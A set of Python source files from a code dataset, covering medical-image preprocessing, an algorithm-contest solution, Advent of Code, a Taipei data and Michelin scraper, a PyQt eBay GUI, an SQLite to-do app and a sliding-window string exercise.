'n':\n seg_dirs = seg_n_reg_dirs\n seg_crop_dir = seg_n_crop_dir\n # registration for image and seg\n img_ids = []\n count = 0\n for img_dir in img_reg_dirs:\n img_id = img_dir.split('/')[-1].split('.')[0]\n for seg_dir in seg_dirs:\n seg_id = seg_dir.split('/')[-1].split('.')[0]\n if img_id == seg_id:\n count += 1\n print(count, img_id)\n img_ids.append(img_id)\n try:\n crop_top(\n patient_id=img_id,\n img_dir=img_dir,\n seg_dir=seg_dir,\n crop_shape=crop_shape,\n return_type='sitk_object',\n output_img_dir=img_crop_dir,\n output_seg_dir=seg_crop_dir,\n image_format=image_format)\n except Exception as e:\n print(e, 'crop failed!')\n\n\ndef main():\n\n root_dir = '/mnt/aertslab/USERS/Zezhong/HN_OUTCOME'\n #proj_dir = root_dir + '/DFCI/new_curation'\n proj_dir = 
'/mnt/kannlab_rfa/Zezhong/HeadNeck/Data/BWH'\n tumor_type = 'p_n'\n image_format = 'nrrd'\n crop_shape = (160, 160, 64)\n #crop_shape = (172, 172, 76)\n #step = 'combine_mask'\n\n #for step in ['combine_mask', 'get_pn_seg', 'interp_reg_crop']:\n for step in ['get_seg_info']:\n if step == 'change_name':\n change_img_name(proj_dir)\n elif step == 'get_seg_info':\n get_seg_info(proj_dir)\n elif step == 'combine_mask':\n for tumor_type in ['p']:\n combine_mask2(proj_dir, tumor_type)\n elif step == 'get_pn_seg':\n get_pn_seg(proj_dir)\n elif step == 'interp_reg_crop':\n interp_reg_crop(proj_dir, root_dir, tumor_type, image_format, crop_shape)\n elif step == 'crop':\n crop(proj_dir, tumor_type, crop_shape, image_format)\n\n\nif __name__ == '__main__':\n \n main()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xmuyzz/HeadNeckCancer-Outcome","sub_path":"data_curation/archive/bwh_preprocess.py","file_name":"bwh_preprocess.py","file_ext":"py","file_size_in_byte":25852,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3139471454","text":"# BOJ 6148번\nimport sys\nfrom collections import deque\n\n\ndef solve(sum_heights: int):\n minimum = -1\n\n # 기저 사례\n if len(cows) == 1:\n return cows[0]\n\n if sum_heights < top:\n minimum = get_value(sum_heights)\n return minimum - top\n\n last = cows.popleft()\n to_sub.append(last)\n val = solve(sum_heights - last)\n if val != -1:\n minimum = val\n return minimum\n\n return minimum\n\n\ndef get_value(sum_heights):\n minimum = -1\n for i in range(1 << len(to_sub)):\n value = sum_heights\n for j in range(len(to_sub)):\n if i & (1 << j):\n value += to_sub[j]\n if value >= top and (minimum == -1 or minimum > value):\n minimum = value\n return minimum\n\n\n\"\"\"\ncows = deque([1, 3, 3, 5, 6])\nsum_heights = 14\ntop = 16\nto_sub = [1, 3]\nprint(solve(sum_heights))\n# print(get_value(sum_heights))\n\n\"\"\"\nn, top = map(int, sys.stdin.readline().split())\narr = []\nto_sub = []\nsum_heights = 0\nfor _ in range(n):\n cow = int(sys.stdin.readline())\n arr.append(cow)\n sum_heights += cow\narr.sort()\ncows = deque(arr)\n# print(solve(sum_heights))\nsys.stdout.write(str(solve(sum_heights)))","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/exaustive_search/bookshelf.py","file_name":"bookshelf.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75046450493","text":"#!/usr/bin/env python\n\n#cd Documents/Advent_of_code\n\n#ADVENT OF CODE\n#8TH DECEMBER\n#day8_input.txt\n\n#The file consists of 656 lines, which are instructions comprised of acc (accumulator), jmp (jump) and nop (no operation) operations plus a numerical argument\n# acc: The accumulator value (starts at 0) is modified by the value of the argument. The line immediately below is executed next.\n# jmp: The next line to be executed is specified by the argument relative to the current line.\n# nop: Does nothing. The line immediately below is executed next.\n\n#Part 1: Currently the file is an infinite loop. Before any line gets executed a second time, what is the accumulator value? Answer: 1594\n#Part 2: Fix the file by changing one 'jmp' to a 'nop' or one 'nop' to a 'jmp'. What is the accumulator? 
Answer: \n\nwith open ('day8_input.txt','r') as advent_object:\n advent = advent_object.readlines()\n\n #Turn each line into a list of ['operator', argument, times executed]\n index = 0\n for line in advent:\n newLine = (line.strip()).split(' ')\n newArg = int(newLine[1])\n advent[index] = [newLine[0], newArg, 0]\n index += 1\n \n #Define a function which executes lines until it's about to repeat one\n def run_loop():\n accumulator = 0\n index = 0\n executes = 0\n while advent[index][2] < 1:\n if advent[index][0] == 'acc':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n accumulator += advent[index][1]\n advent[index][2] += 1\n index += 1\n executes += 1\n elif advent[index][0] == 'jmp':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n advent[index][2] += 1 \n index += advent[index][1]\n executes += 1\n elif advent[index][0] == 'nop':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n advent[index][2] += 1\n index += 1\n executes += 1\n print('accumulator: ' + str(accumulator))\n return accumulator\n\n #print(run_loop())\n\n for line in advent:\n if line[0] == 'jmp':\n try:\n line[0] == 'nop'\n run_loop()\n except advent[index][2] > 1:\n continue\n elif line[0] == 'nop':\n try:\n line[0] == 'jmp'\n run_loop()\n except advent[index][2] > 1:\n continue\n\n#0 and 87 are wrong","repo_name":"Jay-Miles/advent_of_code","sub_path":"aoc_2020/day_8.py","file_name":"day_8.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28117982936","text":"#!/usr/bin/env python3\n# -*-coding: utf-8-*-\n#\n# Author: Chiata Liu\n# Date: 24-Nov-2020\n# 公庫處: ���市府公開資料\n#\n# 本程式更新資料:\n# 1. revenue\n# 2. population\n# 3. 
food play\nimport warnings\nwarnings.filterwarnings('ignore')\nimport logging\nimport os\nimport re\nimport datetime\nfrom dateutil import relativedelta\nimport pdfplumber\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import unquote\nimport shutil\n# package\nfrom package import d04_play, d04_food, d04_population, d04_download_img\nfrom package import d03_revenue\n# args\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--foodplay\", required=False,\n\thelp=\"download food play or not;(y/n)\")\nargs = vars(ap.parse_args())\n\n# config\nENCODE = 'utf-8'\nPROJECT = 'tch'\nPATH = '/scraper/tch'\n# PATH = './'\nTMP_DIR = os.path.join(PATH, 'dataset')\nOUTPUT_DIR = os.path.join(PATH, 'output')\nLOG_DIR = os.path.join(PATH, 'log')\nIMG_DIR = os.path.join(OUTPUT_DIR, 'SHAREIMG')\ntoday = datetime.datetime.today()\ntoday_yyyymmdd = today.strftime('%Y%m%d')\nthis_month = today.strftime('%Y%m')\nlast_month = (today + relativedelta.relativedelta(months=-1)).strftime('%Y%m')\n# mkdir\nfor d in [TMP_DIR, OUTPUT_DIR, LOG_DIR, IMG_DIR]:\n if not os.path.exists(d):\n os.mkdir(d)\n \n# logging config\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)s %(levelname)s %(message)s',\n datefmt='%m-%d %H:%M',\n handlers = [logging.FileHandler(f'{LOG_DIR}/{PROJECT}_{today_yyyymmdd}.txt', 'a', 'utf-8'),])\n\n# start\nstart = datetime.datetime.now() \nlogging.info('START')\nprint('START')\n# mv file\ntry:\n file_list = [f for f in os.listdir(OUTPUT_DIR) if os.path.isfile(os.path.join(OUTPUT_DIR, f))]\n for f in file_list:\n # shutil.move(os.path.join(OUTPUT_DIR, f), os.path.join(OUTPUT_DIR, 'his'))\n shutil.copy(os.path.join(OUTPUT_DIR, f), os.path.join(OUTPUT_DIR, 'his'))\n os.remove(os.path.join(OUTPUT_DIR, f))\n logging.info(f'move {len(file_list)} files')\n print(f'move {len(file_list)} files')\nexcept Exception as e:\n logging.warning(f'mv file: {e}') \n print(f'mv file: {e}') \n \n# url pool\n# monthly\npopu_url = 'https://ca.gov.taipei/News_Content.aspx?n=8693DC9620A1AABF&sms=D19E9582624D83CB&s=E70E0ADF8510073C'\nsource_url = 'https://data.taipei/api/dataportal/get-dataset-detail?id=09b12b01-c562-4a0e-9aeb-93312ce57372'\ndept_url = 'https://dof.gov.taipei/News.aspx?n=4D21C7BE105121C3&sms=CB3C416EA7B4104E'\n\n# prn\n# food\nfood_url_1 = 'https://guide.michelin.com/tw/zh_TW/restaurants/1-star-michelin' # 一星\nfood_url_2 = 'https://guide.michelin.com/tw/zh_TW/restaurants/2-stars-michelin' # 二星\nfood_url_3 = 'https://guide.michelin.com/tw/zh_TW/restaurants/3-stars-michelin' # 三星\nfood_url_4 = 'https://guide.michelin.com/tw/zh_TW/restaurants/bib-gourmand' # 富比登\nfood_url_5 = 'https://guide.michelin.com/tw/zh_TW/restaurants/the-plate-michelin' # 餐盤\n# play\nplay_url = 'https://www.travel.taipei/zh-tw/attraction/all-regions?mode=list&sortby=tripadvisor&page=1'\n\nif __name__ == '__main__':\n # part1: TCH_POPULATION\n try:\n popu_param = d04_population.download_file(popu_url, TMP_DIR)\n popu_df = d04_population.create_dataset(*popu_param)\n popu_df.to_csv(f'{OUTPUT_DIR}/TCH_POPULATION.{popu_param[2]}', \n index=False)\n except Exception as e:\n logging.error(f'part1: TCH_POPULATION, error:{e}')\n print(f'part1: TCH_POPULATION, error:{e}')\n\n # part2: TCH_REVENUE\n try:\n rev_snap_yyyymmdd = d03_revenue.download_data(source_url, dept_url, TMP_DIR)\n # check file 1 & file 2 snap date\n if rev_snap_yyyymmdd[0] == rev_snap_yyyymmdd[1]:\n final_df = d03_revenue.create_dataset(TMP_DIR, rev_snap_yyyymmdd[0], rev_snap_yyyymmdd[2])\n 
else:\n print(rev_snap_yyyymmdd[0])\n print(rev_snap_yyyymmdd[1])\n final_df.to_csv(f'{OUTPUT_DIR}/TCH_REVENUE.{rev_snap_yyyymmdd[2]}', index=False)\n except Exception as e:\n logging.error(f'part2: TCH_REVENUE, error:{e}')\n print(f'part2: TCH_REVENUE, error:{e}')\n\n # part6: TCH_FOOD_PLAY\n # FOOD 米其林\n if args['foodplay'] == 'y':\n print(f\"food pay: {args['foodplay']}\")\n try:\n food_url_list = [food_url_1,food_url_2,food_url_3,food_url_4,food_url_5]\n condition = [('STAR', 1), ('STAR', 2), ('STAR', 3), ('FORK', 0), ('PLATE', 0)]\n food = pd.DataFrame()\n for url, (guide_type, star) in zip(food_url_list, condition):\n try:\n data = d04_food.create_dataset(url)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error: {e}, phase 1, {url}')\n print(f'part6: TCH_FOOD, error: {e}, phase 1, {url}')\n try:\n tmp_df = d04_food.data_clean(data, guide_type=guide_type, star=star)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error: {e}, phase 2, {url}')\n print(f'part6: TCH_FOOD, error: {e}, phase 2, {url}')\n food = pd.concat([food, tmp_df])\n food = food.reset_index(drop=True)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error:{e}')\n print(f'part6: TCH_FOOD, error:{e}')\n try:\n # PLAY 景點\n play_url_list = d04_play.create_url_list(play_url)\n info_df = pd.DataFrame()\n for url in play_url_list:\n try:\n info_list = d04_play.create_info_list(url)\n info_df = pd.concat([info_df, pd.DataFrame(info_list)])\n info_df = info_df[list(info_list[0].keys())].reset_index(drop=True)\n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error: {e}, {url}')\n print(f'part6: TCH_PLAY, error: {e}, {url}')\n info_df = info_df.where(info_df.notnull(), None)\n play = d04_play.create_final_df(info_df) \n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error:{e}')\n print(f'part6: TCH_PLAY, error:{e}')\n\n # combined food & play \n # download img\n try:\n tch_food_play = pd.concat([food, play]).reset_index(drop=True)\n tch_food_play = d04_download_img.rebuild_dataset(tch_food_play, IMG_DIR, today_yyyymmdd)\n tch_food_play['PIC'] = tch_food_play['PIC'].apply(lambda x: x.replace('./output', '')) \n tch_food_play['SNAP_DATE'] = tch_food_play['SNAP_DATE'].apply(lambda x: datetime.datetime.strptime(x.strftime('%Y%m%d'),'%Y%m%d'))\n tch_food_play['STAR'] = tch_food_play['STAR'].astype(float)\n # 中英文名稱格式變更 20201224\n tch_food_play['C_NAME'] = tch_food_play['C_NAME'].apply(lambda x: x.upper() if x.replace(' ', '').isalpha() else x)\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].fillna('')\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: x.replace('-', ' ').capitalize())\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: None if x == '' else x) \n # 處理編碼問題 20210114\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: unquote(x, 'utf-8') if x is not None else None) \n tch_food_play = tch_food_play.where(tch_food_play.notnull(), None)\n tch_food_play.to_csv(f'{OUTPUT_DIR}/TCH_FOOD_PLAY.{today_yyyymmdd}',\n index=False,\n encoding=ENCODE)\n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error:{e}')\n print(f'part6: TCH_PLAY, error:{e}')\n\n end = datetime.datetime.now() \n delta = str(end - start)\n logging.info(f'DONE, time:{delta}')\n print(f'DONE, time:{delta}')\n logging.shutdown() 
\n","repo_name":"jasonliu1990/scraper","sub_path":"tch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"487779752","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport api\nimport sys\nimport threading\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n self.folder = None\n\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(515, 515)\n MainWindow.setWindowTitle\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.formLayout = QtWidgets.QFormLayout(self.centralwidget)\n self.formLayout.setObjectName(\"formLayout\")\n\n spacerItem = QtWidgets.QSpacerItem(\n 20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.HeaderLabel = QtWidgets.QLabel(self.centralwidget)\n self.HeaderLabel.setTextFormat(QtCore.Qt.AutoText)\n self.HeaderLabel.setObjectName(\"HeaderLabel\")\n\n self.tokenInput = QtWidgets.QPlainTextEdit(self.centralwidget)\n self.tokenInput.setObjectName(\"tokenInput\")\n\n self.startDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.startDateLabel.setObjectName(\"startDateLabel\")\n\n self.startDatePicker = QtWidgets.QDateEdit(self.centralwidget)\n self.startDatePicker.setMinimumDate(QtCore.QDate(1900, 1, 1))\n self.startDatePicker.setCalendarPopup(True)\n self.startDatePicker.setDate(QtCore.QDate(2014, 1, 1))\n self.startDatePicker.setObjectName(\"startDatePicker\")\n\n self.endDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.endDateLabel.setObjectName(\"endDateLabel\")\n\n self.endDatePicker = QtWidgets.QDateEdit(self.centralwidget)\n self.endDatePicker.setMinimumDate(QtCore.QDate(1900, 1, 1))\n self.endDatePicker.setCalendarPopup(True)\n self.endDatePicker.setDate(QtCore.QDate(2014, 1, 1))\n self.endDatePicker.setObjectName(\"endDatePicker\")\n\n self.browseLabel = QtWidgets.QLabel(self.centralwidget)\n self.browseLabel.setObjectName(\"browseLabel\")\n\n self.browseButton = QtWidgets.QPushButton(self.centralwidget)\n self.browseButton.setObjectName(\"browseButton\")\n self.browseButton.clicked.connect(self.launchBrowse)\n\n self.getButton = QtWidgets.QPushButton(self.centralwidget)\n self.getButton.setObjectName(\"getButton\")\n self.getButton.clicked.connect(self.onClick)\n\n self.status_dateRange = QtWidgets.QLabel(\n self.centralwidget) # current date range (max 120 days)\n self.status_dateRange.setObjectName(\"status_dateRange\")\n self.status_numberofEntries = QtWidgets.QLabel(\n self.centralwidget) # total entires in that date range\n self.status_numberofEntries.setObjectName(\"status_numberofEntries\")\n self.status_pageNumber = QtWidgets.QLabel(\n self.centralwidget) # page number\n self.status_pageNumber.setObjectName(\"status_pageNumber\")\n self.status_totalNumberOfEntries = QtWidgets.QLabel(\n self.centralwidget) # total entires\n self.status_totalNumberOfEntries.setObjectName(\n \"status_totalNumberOfEntries\")\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.errorMessage = QtWidgets.QLabel(self.centralwidget)\n self.errorMessage.setObjectName(\"errorMessage\")\n\n # Mount everything to the form in order\n self.mountWidgetInForm(self.HeaderLabel)\n self.mountWidgetInForm(self.tokenInput)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n 
self.mountWidgetInForm(self.startDateLabel)\n self.mountWidgetInForm(self.startDatePicker)\n self.mountWidgetInForm(self.endDateLabel)\n self.mountWidgetInForm(self.endDatePicker)\n self.mountWidgetInForm(self.browseLabel)\n self.mountWidgetInForm(self.browseButton)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n self.mountWidgetInForm(self.getButton)\n self.mountWidgetInForm(self.errorMessage)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n self.mountWidgetInForm(self.status_dateRange)\n self.mountWidgetInForm(self.status_pageNumber)\n self.mountWidgetInForm(self.status_numberofEntries)\n self.mountWidgetInForm(self.status_totalNumberOfEntries)\n\n self.retranslateUi(MainWindow)\n\n indexCounter = 0\n\n def launchBrowse(self):\n fileDialogue = QtWidgets.QFileDialog()\n fileDialogue.setFileMode(QtWidgets.QFileDialog.Directory)\n self.folder = fileDialogue.getExistingDirectory(\n self.centralwidget, \"Choose Folder\", \"\")\n if not self.folder is None:\n self.browseLabel.setText(self.folder)\n\n def mountWidgetInForm(self, widget):\n self.formLayout.setWidget(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, widget)\n self.indexCounter += 1\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\n \"MainWindow\", \"eBay Product Details Getter\"))\n self.tokenInput.setPlaceholderText(\n _translate(\"MainWindow\", \"Paste Token\"))\n self.startDateLabel.setText(_translate(\"MainWindow\", \"Start Date\"))\n self.endDateLabel.setText(_translate(\"MainWindow\", \"End Date\"))\n self.getButton.setText(_translate(\"MainWindow\", \"Get Product Details\"))\n self.HeaderLabel.setText(_translate(\n \"MainWindow\", \"eBay Details Getter\"))\n self.browseButton.setText(_translate(\"MainWindow\", \"Browse\"))\n self.browseLabel.setText(_translate(\n \"MainWindow\", \"Choose File(s) Destination\"))\n\n def setErrorMessage(self, msg):\n self.errorMessage.setText(\"An error has occured:<br>%s\" % msg)\n\n def clearErrorMessage(self):\n self.errorMessage.setText(\"\")\n\n def onClick(self):\n\n self.getButton.setDisabled(True)\n self.clearErrorMessage()\n try:\n if not self.folder is None:\n handleThread = threading.Thread(\n target=api.handleClick, args=(self,))\n handleThread.start()\n else:\n self.setErrorMessage(\"No folder selected.\")\n self.getButton.setDisabled(False)\n except Exception as e:\n self.setErrorMessage(e)\n self.getButton.setDisabled(False)\n","repo_name":"chastain1337/eBayProductDetailsGetter","sub_path":"src/main/python/mainWindowUI.py","file_name":"mainWindowUI.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25991430399","text":"\"\"\"\n Utilities\n\"\"\"\n\nfrom collections import OrderedDict\n\nimport numpy as np\nimport pandas as pd\n\nfrom . 
import constants as c\n\n\ndef resample(df, period, mdate):\n \"\"\"Resample and fill missing periods\"\"\"\n\n index = pd.date_range(df.index.min(), mdate, freq=period)\n df = df.resample(period).sum().reindex(index).fillna(0)\n\n # If working with years, cast the index to integer\n if period == \"YS\":\n df.index = df.index.year\n\n return df\n\n\ndef serie_to_dict(serie):\n \"\"\"Transform a serie to a dict\"\"\"\n\n # If index is datetime transform to string\n if np.issubdtype(serie.index, np.datetime64):\n serie.index = serie.index.strftime(\"%Y-%m-%d\")\n\n return serie.apply(lambda x: round(x, 2)).to_dict()\n\n\ndef series_to_dicts(series):\n \"\"\"Transform a dict with series to a dict of dicts\"\"\"\n\n out = OrderedDict()\n\n for name, x in series.items():\n out[name] = serie_to_dict(x)\n\n return out\n\n\ndef time_average(dfi, months=12, exponential=False, center=False):\n \"\"\"\n Do some time average\n\n Args:\n dfi: input dataframe (or series)\n months: num of months for the average\n exponential: whether to use EWM or simple rolling\n \"\"\"\n\n # Exponential moving average\n if exponential:\n # No negative values\n months = max(0, months)\n\n df = dfi.ewm(span=months, min_periods=0, adjust=False, ignore_na=False)\n\n # Regular moving average\n else:\n # One month at least\n months = max(1, months)\n\n df = dfi.rolling(months, min_periods=1, center=center)\n\n return df.mean().apply(lambda x: round(x, 2))\n\n\ndef smooth_serie(dfi):\n \"\"\"Smooth a serie by doing a time_average 2 times\"\"\"\n\n df = time_average(dfi, months=12, center=True)\n return time_average(df, months=6, center=True)\n\n\ndef filter_by_date(dfs_in, mdate):\n \"\"\"\n No data greater than mdate and complete missing months\n\n Args:\n dfs_in: dict with dataframes\n mdate: date of the report\n \"\"\"\n\n dfs = dfs_in.copy()\n\n # Get last date of month\n mdate = pd.to_datetime(mdate) + pd.tseries.offsets.MonthEnd(1)\n\n for name, df in dfs.items():\n\n # Filter out future data\n if df.index.name == c.COL_DATE:\n df = df[df.index <= mdate]\n\n dfs[name] = df\n\n return dfs\n","repo_name":"alveraboquet/vtasks","sub_path":"src/expensor/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"14532294024","text":"import sqlite3\n\nclass Todo():\n def __init__(self):\n self.conn = sqlite3.connect('todo.db')\n self.c = self.conn.cursor()\n self.create_task_table()\n\n def create_task_table(self):\n self.c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS tasks (\n id INTEGER PRIMARY KEY,\n name TEXT NOT NULL,\n priority INTEGER NOT NULL\n );\n \"\"\")\n\n def add_task(self):\n name = input('Enter task name: ')\n priority = int(input(\"task priority: \"))\n print()\n if not self.find_task(name):\n self.c.execute(\"\"\"\n INSERT INTO tasks (name, priority)\n values (?,?);\n \"\"\", (name, priority))\n self.conn.commit()\n else:\n print('record already exists \\n')\n\n def show_all(self):\n for row in self.c.execute(\"\"\"SELECT * FROM tasks\"\"\"):\n print(row)\n print()\n\n # fetchall doesnt use iterator but memory issues on bog data\n # self.c.execute(\"\"\"SELECT * FROM tasks\"\"\")\n # rows = c.fetchall()\n # for row in rows:\n # print(row)\n\n # fetchone get one row per call like a generator\n # self.c.execute(\"\"\"SELECT * FROM tasks\"\"\")\n # print(self.c.fetchone())\n # print(self.c.fetchone())\n\n\n def close_conn(self):\n self.conn.close()\n\n def find_task(self, name):\n 
self.c.execute(\"\"\"select * from tasks\n WHERE name like ?\"\"\", (name,))\n rows = self.c.fetchall()\n return rows\n\n def find_task_by_id(self, id):\n self.c.execute(\"\"\"SELECT * FROM tasks\n WHERE id = ?\"\"\", (id,))\n return True if len(self.c.fetchall()) ==1 else False\n\n def show_task_by_name(self):\n name = input(\"task name to find: \")\n print()\n for row in self.c.execute(\"\"\"select * from tasks\n WHERE name like ?\"\"\", (name,)):\n print(row)\n print()\n\n def update_priority_by_id(self):\n id_to_update = int(input(\"task id to be updated: \"))\n updated_priority = int(input(\"new priority level? \"))\n if self.find_task_by_id(id_to_update):\n self.c.execute(\"\"\"\n UPDATE tasks\n SET priority = ?\n WHERE id = ?\"\"\", (updated_priority, id_to_update))\n self.conn.commit()\n\n def delete_task(self):\n id_to_delete = int(input(\"recode id to delete: \"))\n if self.find_task_by_id(id_to_delete):\n self.c.execute(\"\"\"\n DELETE FROM tasks\n WHERE id = ?\"\"\", (id_to_delete, ))\n self.conn.commit()\n\n\n\n\n\n# tasks = [\n# ('My second task', 5),\n# ('My third task', 10),\n# ('My forth task', 11),\n# ]\n#\n# c.executemany(\"\"\"\n# INSERT INTO tasks (name, priority)\n# values (?,?);\n# \"\"\", tasks)\n#\n# conn.commit()\n\napp = Todo()\n\nwhile True:\n try:\n choice = int(input(\"\"\"1 - Show Tasks \\\n \\n2 - Add Task \\\n \\n3 - Change Priority \\\n \\n4 - Delete Task \\\n \\n5 - Exit\\n\n \"\"\"))\n except:\n print('please select from options above by number')\n continue\n if choice not in range(1,6):\n print('please select from options above by number')\n continue\n if choice == 1:\n app.show_all()\n if choice == 2:\n app.add_task()\n if choice == 3:\n app.update_priority_by_id()\n if choice == 4:\n app.delete_task()\n if choice == 5:\n app.close_conn()\n exit('Good Bye')\n","repo_name":"FWRobins/PCPP","sub_path":"SQL_lite_db/SQL_lite.py","file_name":"SQL_lite.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33856791276","text":"import argparse\n\ndef get_layers(values, height, width):\n layers = list()\n layer_length = height * width\n for row in range(0, height):\n layers.append(list())\n for col in range(0, width):\n layers[row].append(list())\n\n for index in range(0, len(values)):\n row = (index % layer_length) // width\n col = (index % layer_length) % width\n layers[row][col].append(values[index])\n\n return layers\n\ndef count_value_in_layer(layers, layer, value):\n total = 0\n for row in range(0, len(layers)):\n for col in range(0, len(layers[row])):\n if layers[row][col][layer] == value:\n total += 1\n return total\n\ndef layer_with_min_value_count(layers, value):\n min_count = len(layers) * len(layers[0])\n min_layer = 0\n for layer in range(0, len(layers[0][0])):\n count = count_value_in_layer(layers, layer, value)\n if count < min_count:\n min_count = count\n min_layer = layer\n\n return min_layer\n\ndef get_pixel_value(layers, row, col):\n for pixel in layers[row][col]:\n if pixel == 0:\n return 0\n if pixel == 1:\n return 1\n\ndef get_image(layers):\n image = list()\n for row in range(0, len(layers)):\n image.append(list())\n for col in range(0, len(layers[row])):\n image[row].append(get_pixel_value(layers, row, col))\n\n return image\n\ndef print_image(image):\n for row in range(0, len(image)):\n for col in range(0, len(image[row])):\n if image[row][col] == 1:\n print('#', end='')\n else:\n print(' ', end='')\n print('')\n\ndef main():\n parser = 
argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', default='../input/sample.txt')\n parser.add_argument('-p', '--part', choices=[1, 2], default=1, type=int)\n parser.add_argument('-he', '--height', type=int)\n parser.add_argument('-w', '--width', type=int)\n args = parser.parse_args()\n\n values = list()\n with open(args.filename, 'r') as file:\n values.extend([int(x) for x in file.readline()])\n\n layers = get_layers(values, args.height, args.width)\n if args.part == 1:\n checksum_layer = layer_with_min_value_count(layers, 0)\n print(count_value_in_layer(layers, checksum_layer, 1) * count_value_in_layer(layers, checksum_layer, 2))\n elif args.part == 2:\n print_image(get_image(layers))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ganon11/AdventCode","sub_path":"2019/Day8/src/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40541656414","text":"# Maximum Number of Vowels in a Substring of Given Length\n\n'''\nGiven a string s and an integer k, \nreturn the maximum number of vowel letters \nin any substring of s with length k.\n\nVowel letters in English are 'a', 'e', 'i', 'o', and 'u'.\n\n\nExample 1:\n\nInput: s = \"abciiidef\", k = 3\nOutput: 3\nExplanation: The substring \"iii\" contains 3 vowel letters.\n\n\nExample 2:\n\nInput: s = \"aeiou\", k = 2\nOutput: 2\nExplanation: Any substring of length 2 contains 2 vowels.\n\n\nExample 3:\n\nInput: s = \"leetcode\", k = 3\nOutput: 2\nExplanation: \"lee\", \"eet\" and \"ode\" contain 2 vowels.\n\n'''\n# --------------sol1--------TLE\n# find the substring of length k\n# which has maximum number of vowels\n\n#initialize curvowels = 0\n# first find vowels for first k set of elements\n# initialize the variable max_vowels = curvowels\n\n# start the sliding window loop\n# for each window add one new item , remove one old item\n# calculate curvowels\n# compare and update max_vowel with curvowels\n# finally return max_vowels\n\ndef maxVowelsSubstring(str,k):\n cur_vowels = 0\n # str_list = list(str)\n temp_str = []\n for i in range(0,k):\n temp_str.append(str[i])\n if(str[i] in 'aeiou'):\n cur_vowels+=1\n \n max_vowels = cur_vowels\n for i in range(k,len(str)):\n cur_vowels = 0\n temp_str.append(str[i])\n temp_str.pop(0)\n for j in temp_str:\n if j in 'aeiou':\n cur_vowels += 1\n \n if cur_vowels>max_vowels:\n max_vowels=cur_vowels\n \n return max_vowels\n\nprint(maxVowelsSubstring(\"abciiidef\",3)) #3\nprint(maxVowelsSubstring(\"aeiou\",2)) #2\nprint(maxVowelsSubstring(\"leetcode\",3)) #2 \n\n\nprint('-----------------') \n\n# ----------------sol2-------------O(n)----------------\n# we are given a string s and a length k\n# we have to find all the substrings of length k \n# among all these substrings which has the maximum number of vowels\n# we have to return that count\n# we need to use sliding window here\n\n# s = \"abciiidef\", k = 3\n\ndef max_vowels_substring(s,k):\n cur_vowels = 0\n \n for i in range(0,k):\n if s[i] in 'aeiou':\n cur_vowels +=1\n max_vowels = cur_vowels\n \n for i in range(k,len(s)):\n # cur_vowels = 0\n if s[i] in 'aeiou':\n cur_vowels+=1\n if s[i-k] in 'aeiou':\n cur_vowels-=1\n \n max_vowels=max(max_vowels,cur_vowels)\n \n return max_vowels\n\nprint(max_vowels_substring(\"abciiidef\",3)) #3\nprint(max_vowels_substring(\"aeiou\",2)) 